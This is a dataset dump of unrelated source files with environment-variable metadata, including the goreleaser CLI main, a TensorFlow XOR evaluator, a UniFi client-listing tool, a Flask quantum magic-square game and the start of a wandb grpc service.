log.SetHandler(cli.Default)
fmt.Println()
defer fmt.Println()
var app = kingpin.New("goreleaser", "Deliver Go binaries as fast and easily as possible")
var debug = app.Flag("debug", "Enable debug mode").Bool()
var config = app.Flag("config", "Load configuration from file").Short('c').Short('f').PlaceHolder(".goreleaser.yml").String()
var initCmd = app.Command("init", "Generates a .goreleaser.yml file").Alias("i")
var checkCmd = app.Command("check", "Checks if configuration is valid").Alias("c")
var releaseCmd = app.Command("release", "Releases the current project").Alias("r").Default()
var releaseNotes = releaseCmd.Flag("release-notes", "Load custom release notes from a markdown file").PlaceHolder("notes.md").String()
var releaseHeader = releaseCmd.Flag("release-header", "Load custom release notes header from a markdown file").PlaceHolder("notes-header.md").String()
var releaseFooter = releaseCmd.Flag("release-footer", "Load custom release notes footer from a markdown file").PlaceHolder("notes-footer.md").String()
var snapshot = releaseCmd.Flag("snapshot", "Generate an unversioned snapshot release, skipping all validations and without publishing any artifacts").Bool()
var skipPublish = releaseCmd.Flag("skip-publish", "Skips publishing artifacts").Bool()
var skipSign = releaseCmd.Flag("skip-sign", "Skips signing the artifacts").Bool()
var skipValidate = releaseCmd.Flag("skip-validate", "Skips several sanity checks").Bool()
var rmDist = releaseCmd.Flag("rm-dist", "Remove the dist folder before building").Bool()
var parallelism = releaseCmd.Flag("parallelism", "Amount tasks to run concurrently").Short('p').Default("4").Int()
var timeout = releaseCmd.Flag("timeout", "Timeout to the entire release process").Default("30m").Duration()
app.Version(buildVersion(version, commit, date, builtBy))
app.VersionFlag.Short('v')
app.HelpFlag.Short('h')
app.UsageTemplate(static.UsageTemplate)
cmd := kingpin.MustParse(app.Parse(os.Args[1:]))
if *debug {
log.SetLevel(log.DebugLevel)
}
switch cmd {
case initCmd.FullCommand():
var filename = *config
if filename == "" {
filename = ".goreleaser.yml"
}
if err := initProject(filename); err != nil {
log.WithError(err).Error("failed to init project")
os.Exit(1)
return
}
log.WithField("file", filename).Info("config created; please edit accordingly to your needs")
case checkCmd.FullCommand():
if err := checkConfig(*config); err != nil {
log.WithError(err).Errorf(color.New(color.Bold).Sprintf("config is invalid"))
os.Exit(1)
return
}
log.Infof(color.New(color.Bold).Sprintf("config is valid"))
case releaseCmd.FullCommand():
start := time.Now()
log.Infof(color.New(color.Bold).Sprintf("releasing using goreleaser %s...", version))
var options = releaseOptions{
Config: *config,
ReleaseNotes: *releaseNotes,
ReleaseHeader: *releaseHeader,
ReleaseFooter: *releaseFooter,
Snapshot: *snapshot,
SkipPublish: *skipPublish,
SkipValidate: *skipValidate,
SkipSign: *skipSign,
RmDist: *rmDist,
Parallelism: *parallelism,
Timeout: *timeout,
}
if err := releaseProject(options); err != nil {
log.WithError(err).Errorf(color.New(color.Bold).Sprintf("release failed after %0.2fs", time.Since(start).Seconds()))
os.Exit(1)
return
}
log.Infof(color.New(color.Bold).Sprintf("release succeeded after %0.2fs", time.Since(start).Seconds()))
}
}
func checkConfig(filename string) error {
cfg, err := loadConfig(filename)
if err != nil {
return err
}
var ctx = context.New(cfg)
return ctrlc.Default.Run(ctx, func() error {
log.Info(color.New(color.Bold).Sprint("checking config:"))
return defaults.Pipe{}.Run(ctx)
})
}
func releaseProject(options releaseOptions) error {
cfg, err := loadConfig(options.Config)
if err != nil {
return err
}
ctx, cancel := context.NewWithTimeout(cfg, options.Timeout)
defer cancel()
ctx.Parallelism = options.Parallelism
log.Debugf("parallelism: %v", ctx.Parallelism)
ctx.ReleaseNotes = options.ReleaseNotes
ctx.ReleaseHeader = options.ReleaseHeader
ctx.ReleaseFooter = options.ReleaseFooter
ctx.Snapshot = options.Snapshot
ctx.SkipPublish = ctx.Snapshot || options.SkipPublish
ctx.SkipValidate = ctx.Snapshot || options.SkipValidate
ctx.SkipSign = options.SkipSign
ctx.RmDist = options.RmDist
return ctrlc.Default.Run(ctx, func() error {
for _, pipe := range pipeline.Pipeline {
if err := middleware.Logging(
pipe.String(),
middleware.ErrHandler(pipe.Run),
middleware.DefaultInitialPadding,
)(ctx); err != nil {
return err
}
}
return nil
})
}
// InitProject creates an example goreleaser.yml in the current directory
func initProject(filename string) error {
if _, err := os.Stat(filename); !os.IsNotExist(err) {
if err != nil {
return err
}
return fmt.Errorf("%s already exists", filename)
}
log.Infof(color.New(color.Bold).Sprintf("Generating %s file", filename))
return ioutil.WriteFile(filename, []byte(static.ExampleConfig), 0644)
}
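// loadConfig loads the given config file; when no path is given it tries the
// default goreleaser file names and falls back to an empty config.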
func loadConfig(path string) (config.Project, error) {
if path != "" {
return config.Load(path)
}
for _, f := range [4]string{
".goreleaser.yml",
".goreleaser.yaml",
"goreleaser.yml",
"goreleaser.yaml",
} {
proj, err := config.Load(f)
if err != nil && os.IsNotExist(err) {
continue
}
return proj, err
}
// the user didn't specify a config file and the known possible file names
// don't exist, so, return an empty config and a nil err.
log.Warn("could not find a config file, using defaults...")
return config.Project{}, nil
}
func buildVersion(version, commit, date, builtBy string) string {
var result = fmt.Sprintf("version: %s", version)
if commit != "" {
result = fmt.Sprintf("%s\ncommit: %s", result, commit)
}
if date != "" {
result = fmt.Sprintf("%s\nbuilt at: %s", result, date)
}
if builtBy != "" {
result = fmt.Sprintf("%s\nbuilt by: %s", result, builtBy)
}
return result
}
| [
"\"CI\""
]
| []
| [
"CI"
]
| [] | ["CI"] | go | 1 | 0 | |
examples/statement/main.go | package main
import (
"context"
"database/sql"
"fmt"
"log"
"os"
_ "github.com/jackc/pgx/v4/stdlib"
"github.com/opendoor/pggen"
"github.com/opendoor/pggen/examples/statement/models"
)
func main() {
ctx := context.Background()
conn, err := sql.Open("pgx", os.Getenv("DB_URL"))
if err != nil {
log.Fatal(err)
}
pgClient := models.NewPGClient(conn)
id, err := pgClient.InsertUser(ctx, &models.User{
Email: "[email protected]",
Nickname: "Alph",
})
if err != nil {
log.Fatal(err)
}
_, err = pgClient.DeleteUsersByNickname(ctx, "Alph")
if err != nil {
log.Fatal(err)
}
_, err = pgClient.GetUser(ctx, id)
if err == nil {
log.Fatal("Alph is unexpectedly still in the db")
}
if pggen.IsNotFoundError(err) {
fmt.Printf("Alph not found\n")
}
}
| [
"\"DB_URL\""
]
| []
| [
"DB_URL"
]
| [] | ["DB_URL"] | go | 1 | 0 | |
xor-nn-eval.py | import os
import tensorflow as tf
import time
import csv
# Used to supress AVX warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
NUM_EXAMPLES = 4 # Number of training or evaluation examples
NUM_FEATURES = 2 # Number of input features
NUM_LABELS = 1 # Number of output features or class labels
NUM_HIDDEN = 2 # Number of hidden/middle layer nodes
# Path to training or evaluation file - NEW DATA
INPUT_FILE = "data/xor-eval.csv"
# Path to the network model save file - TRAINED MODEL
MODEL_PATH = "data/xor-model.ckpt"
# Array for the input features
trainx = []
# Array for the output labels/features
trainy = []
# Load inputs and labels from disk
# NOTE: assumes 2 inputs followed by 1 label
# NOTE: files assumed to be located in a data directory
with open(INPUT_FILE, 'r') as csvfile:
input_data = csv.reader(csvfile, delimiter=',')
for row in input_data:
trainx.append([float(row[0]), float(row[1])])
trainy.append([float(row[2])])
# Define the input layer placeholders
x_ = tf.placeholder(tf.float32, shape=[NUM_EXAMPLES, NUM_FEATURES], name = 'inputs')
# Define the desired/target output placeholders
y_ = tf.placeholder(tf.float32, shape=[NUM_EXAMPLES, NUM_LABELS], name = 'labels')
# Define weights
Weights1 = tf.Variable(tf.random_uniform([NUM_FEATURES, NUM_HIDDEN], -1, 1), name = "Weights1")
Weights2 = tf.Variable(tf.random_uniform([NUM_HIDDEN, NUM_LABELS], -1, 1), name = "Weights2")
# Define the BIAS node
Bias1 = tf.Variable(tf.zeros([NUM_HIDDEN]), name = "Bias1")
Bias2 = tf.Variable(tf.zeros([NUM_LABELS]), name = "Bias2")
# Feed forward to the hidden layer
H1 = tf.sigmoid(tf.matmul(x_, Weights1) + Bias1)
# Feedforward to the output layer - Hypothesis is what the
# neural network thinks it should output for a
# given input.
Hypothesis = tf.sigmoid(tf.matmul(H1, Weights2) + Bias2)
# Setup the cost function and set the traning method
# We are using the squared error (ACTUAL - DESIRED)
cost = tf.reduce_sum(tf.square(Hypothesis - y_))
# Initialise the variables and create a session
init = tf.global_variables_initializer()
# 'Saver' op to save and restore all the variables
saver = tf.train.Saver()
sess = tf.Session()
# Initialise the session
sess.run(init)
# Restore model weights from previously saved model
saver.restore(sess, MODEL_PATH)
#print("Model restored from file: %s" % save_path)
print("Model restored from file")
# Run the network
t_start = time.perf_counter()  # time.clock() was removed in Python 3.8
# This will run the network and return the hypothesis results along with the cost/error
hp, ct = sess.run([Hypothesis,cost], feed_dict={x_: trainx, y_: trainy})
print("Hypothesis\tTarget\tError")
for i in range(len(hp)):
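# absolute error between the network output (hypothesis) and the target label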
hyp_error = abs(hp[i] - trainy[i])
print(hp[i], '\t', trainy[i], '\t', hyp_error)
t_end = time.perf_counter()
print('\n---------------RESULTS------------------------')
print('\nCost: ', ct)
print('Elapsed time: ', t_end - t_start)
print('\n----------------------------------------------')
| []
| []
| [
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CPP_MIN_LOG_LEVEL"] | python | 1 | 0 | |
example/annict/main.go | package main
import (
"context"
"fmt"
"net/http"
"os"
"github.com/vanillaricewraps/gqlgenc/client"
"github.com/vanillaricewraps/gqlgenc/example/annict/gen"
)
func main() {
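// the Annict personal access token is read from the ANNICT_KEY environment
// variable and sent as a Bearer token on every request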
key := os.Getenv("ANNICT_KEY")
authHeader := func(req *http.Request) {
req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", key))
}
annictClient := NewAnnictClient(client.NewClient(http.DefaultClient, "https://api.annict.com/graphql", authHeader))
ctx := context.Background()
getProfile, err := annictClient.GetProfile(ctx)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
fmt.Println(*getProfile.Viewer.AvatarURL, getProfile.Viewer.RecordsCount, getProfile.Viewer.WatchedCount)
list, err := annictClient.SearchWorks(ctx, []string{"2017-spring"})
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
for _, node := range list.SearchWorks.Nodes {
fmt.Println(node.ID, node.AnnictID, node.Title, *node.Work.Image.RecommendedImageURL)
}
getWork, err := annictClient.GetWork(ctx, []int64{list.SearchWorks.Nodes[0].AnnictID})
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
work := getWork.SearchWorks.Nodes[0]
_, err = annictClient.UpdateWorkStatus(ctx, work.ID)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
_, err = annictClient.CreateRecordMutation(ctx, work.Episodes.Nodes[0].ID)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
getProfile2, err := annictClient.GetProfile(ctx)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
fmt.Println(getProfile2.Viewer.RecordsCount, getProfile2.Viewer.WatchedCount)
res, err := annictClient.ListWorks(ctx, nil, nil, 5)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
fmt.Println(res.Viewer.Works.Edges[0].Node.Title, res.Viewer.Works.Edges[0].Cursor, len(res.Viewer.Works.Edges))
}
func NewAnnictClient(c *client.Client) *gen.Client {
return &gen.Client{Client: c}
}
| [
"\"ANNICT_KEY\""
]
| []
| [
"ANNICT_KEY"
]
| [] | ["ANNICT_KEY"] | go | 1 | 0 | |
frameworks/shared/callee.py | import logging
import os
import re
import signal
import sys
from .serialization import deserialize_data, serialize_data
from .utils import InterruptTimeout, Namespace as ns, json_dump, json_loads, kill_proc_tree, touch
class FrameworkError(Exception):
pass
def setup_logger():
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
handlers = [console]
logging.basicConfig(handlers=handlers)
root = logging.getLogger()
root.setLevel(logging.INFO)
trace_level = os.environ.get('AMLB_LOG_TRACE')
if trace_level:
logging.TRACE = int(trace_level)
setup_logger()
log = logging.getLogger(__name__)
def result(output_file=None,
predictions=None, truth=None,
probabilities=None, probabilities_labels=None,
target_is_encoded=False,
error_message=None,
models_count=None,
training_duration=None,
predict_duration=None,
**others):
return locals()
def output_subdir(name, config):
subdir = os.path.join(config.output_dir, name, config.name, str(config.fold))
touch(subdir, as_dir=True)
return subdir
def save_metadata(config, **kwargs):
obj = dict(config.__dict__)
obj.update(kwargs)
json_dump(obj, config.output_metadata_file, style='pretty')
data_keys = re.compile("^(X|y|data)(_.+)?$")
def call_run(run_fn):
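# Reads the benchmark parameters from stdin, deserializes the dataset arrays,
# runs the framework's `run_fn` under a hard timeout, and writes the serialized
# results to the configured result file.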
# log.info(os.environ)
params = ns.from_dict(json_loads(sys.stdin.read()))
def load_data(name, path, **_):
if isinstance(path, str) and data_keys.match(name):
return name, deserialize_data(path)
return name, path
log.debug("Params read from main process:\n%s", params)
ds = ns.walk(params.dataset, load_data)
config = params.config
config.framework_params = ns.dict(config.framework_params)
try:
with InterruptTimeout(config.job_timeout_seconds,
interruptions=[
dict(sig=TimeoutError),
dict(sig=signal.SIGTERM),
dict(sig=signal.SIGQUIT),
dict(sig=signal.SIGKILL),
dict(interrupt='process', sig=signal.SIGKILL)
],
wait_retry_secs=10):
result = run_fn(ds, config)
res = dict(result)
for name in ['predictions', 'truth', 'probabilities']:
arr = result[name]
if arr is not None:
path = os.path.join(config.result_dir, '.'.join([name, 'data']))
res[name] = serialize_data(arr, path)
except BaseException as e:
log.exception(e)
res = dict(
error_message=str(e),
models_count=0
)
finally:
# ensure there's no subprocess left
kill_proc_tree(include_parent=False, timeout=5)
json_dump(res, config.result_file, style='compact')
| []
| []
| [
"AMLB_LOG_TRACE"
]
| [] | ["AMLB_LOG_TRACE"] | python | 1 | 0 | |
tests/conftest.py | import os
from shutil import rmtree, copy
from tempfile import gettempdir
from pathlib import Path
import pytest
from pew._utils import invoke_pew as invoke
@pytest.yield_fixture(scope='session')
def workon_home():
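# Session-scoped fixture: points WORKON_HOME at a fresh directory under the
# system temp dir and removes it after the test session.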
tmpdir = os.environ.get('TMPDIR', gettempdir())
os.environ['WORKON_HOME'] = str(Path(tmpdir) / 'WORKON_HOME')
workon = Path(os.environ['WORKON_HOME'])
rmtree(str(workon), ignore_errors=True)
workon.mkdir(parents=True)
yield workon
rmtree(str(workon))
@pytest.yield_fixture()
def env1(workon_home):
invoke('new', 'env1', '-d')
yield
invoke('rm', 'env1')
@pytest.yield_fixture()
def env2(workon_home):
invoke('new', 'env2', '-d')
yield
invoke('rm', 'env2')
@pytest.yield_fixture()
def testpackageenv(workon_home):
testpackage = str(Path(__file__).parent / 'testpackage')
invoke('new', 'source', '-d')
invoke('in', 'source', 'python', 'setup.py', 'install', cwd=testpackage)
yield
invoke('rm', 'source')
@pytest.yield_fixture()
def testtemplate(workon_home):
sourcetemplate = Path(__file__).parent / 'template_test'
testtemplatefile = workon_home / 'template_test'
copy(str(sourcetemplate), str(testtemplatefile))
testtemplatefile.chmod(0o700)
yield testtemplatefile
testtemplatefile.unlink()
| []
| []
| [
"WORKON_HOME",
"TMPDIR"
]
| [] | ["WORKON_HOME", "TMPDIR"] | python | 2 | 0 | |
go/cmd/unissh-list-machines/main.go | package main
import (
"crypto/tls"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"os"
"sort"
"text/tabwriter"
"github.com/spf13/pflag"
"golang.org/x/xerrors"
"software.sslmate.com/src/go-pkcs12"
)
const (
apiClientUserAgent = "unissh/0.1"
RCOk = "ok"
RCError = "error"
)
type Meta struct {
RC string `json:"rc"`
Message string `json:"msg"`
}
type ListClientResponse struct {
Meta Meta `json:"meta"`
Data []*SiteClient `json:"data"`
}
type ListDeviceResponse struct {
Meta Meta `json:"meta"`
Data []*SiteDevice `json:"data"`
}
type SiteClient struct {
Name string `json:"name"` // The name of client
Hostname string `json:"hostname"` // (Optional) Hostname of client
IP string `json:"ip"` // IP Address
MAC string `json:"mac"` // MAC Address
Network string `json:"network"` // The name of the network the client is connected to
NetworkId string `json:"network_id"` // The id of the network the client is connected to
SiteId string `json:"site_id"`
AssociationTime int `json:"assoc_time"`
LatestAssociationTime int `json:"latest_assoc_time"`
OUI string `json:"oui"`
UserId string `json:"user_id"`
IsGuest bool `json:"is_guest"`
FirstSeen int `json:"first_seen"`
LastSeen int `json:"last_seen"`
IsWired bool `json:"is_wired"`
Noted bool `json:"noted"`
APMAC string `json:"ap_mac"`
Channel int `json:"channel"`
Radio string `json:"radio"`
RadioName string `json:"radio_name"`
ESSID string `json:"essid"`
BSSID string `json:"bssid"`
PowersaveEnabled bool `json:"powersave_enabled"`
Is11r bool `json:"is_11r"`
CCQ int `json:"ccq"`
RSSI int `json:"rssi"`
Noise int `json:"noise"`
Signal int `json:"signal"`
TXRate int `json:"tx_rate"`
RXRate int `json:"rx_rate"`
TXPower int `json:"tx_power"`
IdleTime int `json:"idletime"`
DHCPEndTime int `json:"dhcpend_time"`
Satisfaction int `json:"satisfaction"`
VLAN int `json:"vlan"`
Uptime int `json:"uptime"`
RadioProto string `json:"radio_proto"`
TXBytes int64 `json:"tx_bytes"`
TXPackets int64 `json:"tx_packets"`
TXRetries int64 `json:"tx_retries"`
RXBytes int64 `json:"rx_bytes"`
RXPackets int64 `json:"rx_packets"`
WiFiTXAttempts int `json:"wifi_tx_attempts"`
Authorized bool `json:"authorized"`
}
type SiteDeviceType string
const (
SiteDeviceTypeUSG SiteDeviceType = "usg"
SiteDeviceTypeUSW SiteDeviceType = "usw"
SiteDeviceTypeUAP SiteDeviceType = "uap"
)
type Radio struct {
Name string `json:"name"`
Radio string `json:"radio"`
HT string `json:"ht"`
Channel interface{} `json:"channel"`
TXPowerMode string `json:"tx_power_mode"`
AntennaGain int `json:"antenna_gain"`
MinRSSIEnabled bool `json:"min_rssi_enabled"`
HardNoiseFloorEnabled bool `json:"hard_noise_floor_enabled"`
SensLevelEnabled bool `json:"sens_level_enabled"`
VWireEnabled bool `json:"vwire_enabled"`
MaxTXPower int `json:"max_tx_power"`
MinTXPower int `json:"min_tx_power"`
NSS int `json:"nss"`
RadioCaps int `json:"radio_caps"`
BuiltinAntenna bool `json:"builtin_antenna"`
BuiltinAntennaGain int `json:"builtin_ant_gain"`
CurrentAntennaGain int `json:"current_antenna_gain"`
}
type Ethernet struct {
Name string `json:"name"`
MAC string `json:"mac"`
NumberOfPort int `json:"num_port"`
}
type Port struct {
Name string `json:"name"`
Enable bool `json:"enable"`
Index int `json:"port_idx"`
Media string `json:"media"`
PoE bool `json:"port_poe"`
PoECaps int `json:"poe_caps"`
SpeedCaps int `json:"speed_caps"`
OpMode string `json:"op_mode"`
AutoNeg bool `json:"auto_neg"`
FlowControlRX bool `json:"flowctrl_rx"`
FlowControlTX bool `json:"flowctrl_tx"`
FullDuplex bool `json:"full_duplex"`
IsUplink bool `json:"is_uplink"`
Jumbo bool `json:"jumbo"`
RXBroadcast int64 `json:"rx_broadcast"`
RXBytes int64 `json:"rx_bytes"`
RXDrops int64 `json:"rx_drops"`
RXErrors int64 `json:"rx_errors"`
RXMulticast int64 `json:"rx_multicast"`
RXPackets int64 `json:"rx_packets"`
Satisfaction int `json:"satisfaction"`
STPPathCost int `json:"stp_pathcost"`
STPState string `json:"stp_state"`
TXBroadcast int64 `json:"tx_broadcast"`
TXBytes int64 `json:"tx_bytes"`
TXDrops int64 `json:"tx_drops"`
TXErrors int64 `json:"tx_errors"`
TXMulticast int64 `json:"tx_multicast"`
TXPackets int64 `json:"tx_packets"`
Up bool `json:"up"`
RXByteR int `json:"rx_byte-r"`
TXByteR int `json:"tx_byte-r"`
Masked bool `json:"masked"`
AggregatedBy bool `json:"aggregated_by"`
}
type SiteDevice struct {
Type SiteDeviceType `json:"type"`
Name string `json:"name"` // The name of device
IP string `json:"ip"` // IP Address
MAC string `json:"mac"` // MAC address
Model string `json:"model"`
Serial string `json:"serial"` // Serial code of device
Version string `json:"version"` // Firmware version
InformUrl string `json:"inform_url"`
InformIP string `json:"inform_ip"`
Adopted bool `json:"adopted"`
SiteID string `json:"site_id"`
SSHHostKeyFingerprint string `json:"x_ssh_hostkey_fingerprint"`
Fingerprint string `json:"x_fingerprint"`
Radio []*Radio `json:"radio_table"`
KernelVersion string `json:"kernel_version"`
Architecture string `json:"architecture"`
GatewayMAC string `json:"gateway_mac"`
Uptime int `json:"uptime"`
Ethernet []*Ethernet `json:"ethernet"`
Port []*Port `json:"port_table"`
HasFan bool `json:"has_fan"`
HasTemperature bool `json:"has_temperature"`
LEDOverride string `json:"led_override"`
LEDOverrideColor string `json:"led_override_color"`
LEDOverrideColorBrightness int `json:"led_override_color_brightness"`
OutdoorModeOverride string `json:"outdoor_mode_override"`
LastSeen int `json:"last_seen"`
Upgradable bool `json:"upgradable"`
Uplink *Port `json:"uplink"`
}
type client struct {
Name string
IP string
}
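// getClient fetches the active clients of a site from the UniFi controller REST API.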
func getClient(client *http.Client, host, site string) ([]*SiteClient, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("https://%s/api/s/%s/stat/sta", host, site), nil)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
req.Header.Add("User-Agent", apiClientUserAgent)
res, err := client.Do(req)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
defer res.Body.Close()
if res.StatusCode != http.StatusOK {
return nil, xerrors.Errorf("returns status not ok: %s", res.Status)
}
resBody := &ListClientResponse{}
if err := json.NewDecoder(res.Body).Decode(resBody); err != nil {
return nil, xerrors.Errorf(": %w", err)
}
if resBody.Meta.RC != RCOk {
return nil, xerrors.New(resBody.Meta.Message)
}
return resBody.Data, nil
}
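// getDevice fetches the UniFi devices (gateways, switches, access points) of a site.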
func getDevice(client *http.Client, host, site string) ([]*SiteDevice, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("https://%s/api/s/%s/stat/device", host, site), nil)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
req.Header.Add("User-Agent", apiClientUserAgent)
res, err := client.Do(req)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
resBody := &ListDeviceResponse{}
if err := json.NewDecoder(res.Body).Decode(resBody); err != nil {
return nil, xerrors.Errorf(": %w", err)
}
if err := res.Body.Close(); err != nil {
return nil, xerrors.Errorf(": %w", err)
}
if resBody.Meta.RC != RCOk {
return nil, xerrors.New(resBody.Meta.Message)
}
return resBody.Data, nil
}
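// unissh authenticates with the client certificate, collects clients and devices, and prints a sorted Name/IP table.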
func unissh(host, credentialFile, password, site string) error {
b, err := ioutil.ReadFile(credentialFile)
if err != nil {
return xerrors.Errorf(": %w", err)
}
privateKey, certificate, _, err := pkcs12.DecodeChain(b, password)
if err != nil {
return xerrors.Errorf(": %w", err)
}
tlsCert := tls.Certificate{PrivateKey: privateKey, Certificate: [][]byte{certificate.Raw}}
httpClient := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
Certificates: []tls.Certificate{tlsCert},
},
},
}
clients, err := getClient(httpClient, host, site)
if err != nil {
return xerrors.Errorf(": %w", err)
}
devices, err := getDevice(httpClient, host, site)
if err != nil {
return xerrors.Errorf(": %w", err)
}
siteClients := make([]*client, 0)
for _, v := range clients {
name := v.Name
if name == "" {
name = v.Hostname
}
siteClients = append(siteClients, &client{Name: name, IP: v.IP})
}
for _, v := range devices {
siteClients = append(siteClients, &client{Name: v.Name, IP: v.IP})
}
sort.Slice(siteClients, func(i, j int) bool {
return siteClients[i].Name < siteClients[j].Name
})
w := new(tabwriter.Writer)
w.Init(os.Stdout, 0, 8, 1, '\t', 0)
fmt.Fprintln(w, "Name\tIP\t")
for _, v := range siteClients {
fmt.Fprintf(w, "%s\t%s\n", v.Name, v.IP)
}
w.Flush()
return nil
}
func main() {
host := ""
credentialFile := ""
password := ""
site := "default"
fs := pflag.NewFlagSet("unissh-list-machines", pflag.ContinueOnError)
fs.StringVar(&host, "host", "127.0.0.1:8443", "Unifi Controller URL")
fs.StringVar(&credentialFile, "credential", "", "Credential file (p12)")
fs.StringVar(&password, "password", "", "Password of p12")
fs.StringVar(&site, "site", site, "Site name")
if err := fs.Parse(os.Args[1:]); err != nil {
fs.PrintDefaults()
os.Exit(1)
}
if credentialFile == "" {
credentialFile = os.Getenv("UNISSH_CREDENTIAL_FILE")
}
if password == "" {
password = os.Getenv("UNISSH_PASSWORD")
}
if err := unissh(host, credentialFile, password, site); err != nil {
fmt.Fprintf(os.Stderr, "%+v\n", err)
os.Exit(1)
}
}
| [
"\"UNISSH_CREDENTIAL_FILE\"",
"\"UNISSH_PASSWORD\""
]
| []
| [
"UNISSH_CREDENTIAL_FILE",
"UNISSH_PASSWORD"
]
| [] | ["UNISSH_CREDENTIAL_FILE", "UNISSH_PASSWORD"] | go | 2 | 0 | |
algorithms/Python/strings/sherlock and the valid string.py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isValid function below.
def isValid(s):
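    # Valid if all characters occur equally often, or if removing a single
    # character makes the remaining frequencies equal.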
ss = list(set(s))
fs = []
for c in ss:
fs.append(s.count(c))
if (len(list(set(fs))))==1:
return 'YES'
elif len(list(set(fs)))==2:
mx= max(fs)
mi= min(fs)
if (fs.count(mx) ==1 or fs.count(mi)==1) and (mx-mi == 1):
return 'YES'
elif fs.count(mi)==1 and mi==1:
return 'YES'
return 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = isValid(s)
fptr.write(result + '\n')
fptr.close()
| []
| []
| [
"OUTPUT_PATH"
]
| [] | ["OUTPUT_PATH"] | python | 1 | 0 | |
app/routes.py | import os
from flask import Flask, render_template, request, session, g, redirect
from magicsquare import app
import sqlite3
from contextlib import ExitStack
from pathlib import Path
from cqc.pythonLib import CQCConnection, qubit
from libmagicsquare import MagicSquare
DB_FILE=os.environ.get("MAGICSQUARE_DB_FILE") or "sessions.db"
# Create DB_FILE if needed:
print("Database file: {}".format(DB_FILE))
folder=os.path.dirname(DB_FILE)
if folder:
os.makedirs(folder, exist_ok=True)
conn = sqlite3.connect(DB_FILE)
conn.execute('CREATE TABLE IF NOT EXISTS session (id VARCHAR(256), p1line VARCHAR(256), p1val VARCHAR(256), p2col VARCHAR(256), p2val VARCHAR(256), qres1 VARCHAR(256), qres2 VARCHAR(256))')
conn.commit()
conn.close()
@app.route('/')
@app.route('/index')
def index():
return render_template('accueil.html', titre='Accueil')
def waiting(idsess):
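    # Render the waiting page with the stored state of the given session id.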
conn = sqlite3.connect(DB_FILE)
curr=conn.cursor()
items=curr.execute("SELECT * FROM session WHERE id=? ", (idsess,))
return render_template('waiting.html', items=items.fetchall() )
@app.route('/player1')
def p1():
return render_template('p1.html', titre='player 1')
@app.route('/waiting1',methods = ["POST"])
def waiting1():
conn = sqlite3.connect(DB_FILE)
ids = request.form["numsess"]
numline = request.form["numline"]
x1 = request.form["select1"]
x2 = request.form["select2"]
x3 = request.form["select3"]
x=x1+x2+x3
p2c= 0
p2x= 0
curr=conn.cursor()
curr.execute("INSERT INTO session (id,p1line,p1val,p2col,p2val,qres1,qres2) VALUES (?,?,?,?,?,?,?)",[ids,numline,x,p2c,p2x,"",""] )
conn.commit()
return waiting(ids)
@app.route('/player2')
def p2():
return render_template('p2.html', titre='Player 2')
@app.route('/waiting2',methods = ["POST"])
def waiting2():
conn = sqlite3.connect(DB_FILE)
ids = request.form["numsess"]
numcol = request.form["numline"]
x1 = request.form["select1"]
x2 = request.form["select2"]
x3 = request.form["select3"]
# Classical
x=x1+x2+x3
curr=conn.cursor()
curr.execute("UPDATE session SET p2col=?, p2val=? WHERE id=? ", (numcol, x, ids))
conn.commit()
return waiting(ids)
@app.route('/results/<ids>/',methods = ["GET"])
def results(ids):
conn = sqlite3.connect(DB_FILE)
curr=conn.cursor()
items=curr.execute("SELECT * FROM session WHERE id=? ", (ids,))
items1=items.fetchone()
numline=int(items1[1])-1
numcol=int(items1[3])-1
qres1=items1[5]
qres2=items1[6]
    if qres1 == "" or qres2 == "":
        # Quantum: run the measurements once and persist the results
        with ExitStack() as global_stack:
            magic_square = MagicSquare(global_stack, debug=True)
            ma = magic_square.alice_measurement(numline)
            mb = magic_square.bob_measurement(numcol)
        qres1, qres2 = ma, mb
        conn = sqlite3.connect(DB_FILE)
        curr = conn.cursor()
        curr.execute("UPDATE session SET qres1=?, qres2=? WHERE id=? ", (qres1, qres2, ids))
        conn.commit()
    else:
        # Reuse the measurement results stored on a previous visit
        ma, mb = qres1, qres2
    return render_template('resultats.html', items1=items1, ma=ma, mb=mb, titre="Résultats")
| []
| []
| [
"MAGICSQUARE_DB_FILE"
]
| [] | ["MAGICSQUARE_DB_FILE"] | python | 1 | 0 | |
wandb/sdk/service/service.py | """grpc service.
Reliably launch and connect to grpc process.
"""
import datetime
import enum
import logging
import os
import subprocess
import sys
import tempfile
import time
from typing import Any, Dict, Optional
from typing import TYPE_CHECKING
import grpc
from wandb.proto import wandb_server_pb2 as spb
from wandb.proto import wandb_server_pb2_grpc as pbgrpc
from wandb.sdk.wandb_settings import Settings
if TYPE_CHECKING:
from google.protobuf.internal.containers import MessageMap
def _pbmap_apply_dict(
m: "MessageMap[str, spb.SettingsValue]", d: Dict[str, Any]
) -> None:
for k, v in d.items():
if isinstance(v, datetime.datetime):
continue
if isinstance(v, enum.Enum):
continue
sv = spb.SettingsValue()
if v is None:
sv.null_value = True
elif isinstance(v, int):
sv.int_value = v
elif isinstance(v, float):
sv.float_value = v
elif isinstance(v, str):
sv.string_value = v
elif isinstance(v, bool):
sv.bool_value = v
elif isinstance(v, tuple):
sv.tuple_value.string_values.extend(v)
m[k].CopyFrom(sv)
class _Service:
_stub: Optional[pbgrpc.InternalServiceStub]
def __init__(self) -> None:
